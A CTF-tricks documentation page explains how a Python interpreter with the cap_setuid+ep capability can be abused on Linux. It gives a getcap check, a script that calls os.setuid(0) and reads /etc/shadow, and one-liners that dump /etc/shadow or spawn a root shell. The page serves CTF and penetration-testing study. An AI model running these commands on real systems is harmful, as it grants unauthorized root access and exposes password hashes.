> For the complete documentation index, see [llms.txt](https://sarpers-organization.gitbook.io/ctftricks/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sarpers-organization.gitbook.io/ctftricks/_chapter-intro-14/linux/capabilities/trick-0378.md).

# Execute Script Using Binary With Elevated Capabilities

***

When a binary or interpreter (like `/usr/bin/python3.8`) possesses elevated capabilities (e.g., `cap_setuid+ep`), executing a script using this specific binary allows the script to inherit those capabilities. This enables the script to perform actions requiring privileges the executing user normally lacks.

The presence of capabilities on a file can be checked using the `getcap` command:

```bash
getcap /path/to/binary
```

For instance, if `/usr/bin/python3.8` has `cap_setuid+ep`, running a script `/path/to/script.py` that needs root privileges (like reading `/root/root.txt`) via this binary will succeed.

```bash
/usr/bin/python3.8 /path/to/script.py
```

A simple Python script leveraging the `cap_setuid` capability to read a privileged file like `/etc/shadow` would involve setting the effective user ID to 0 (root) and then executing a command:

```python
import os

# Set the effective user ID to 0 (root)
os.setuid(0)

# Execute a command with root privileges
os.system("cat /etc/shadow")
```

This script can be executed directly using the capable Python binary:

```bash
/usr/bin/python3.8 /path/to/your_script.py
```

Alternatively, the payload can be executed directly from the command line using the `-c` option:

To read a privileged file:

```bash
/usr/bin/python3.8 -c 'import os; os.setuid(0); os.system("cat /etc/shadow")'
```

To spawn a root shell:

```bash
/usr/bin/python3.8 -c 'import os; os.setuid(0); os.system("/bin/sh")'
```

These examples demonstrate how a binary with the `cap_setuid+ep` capability can be abused to execute arbitrary commands or scripts with elevated privileges.
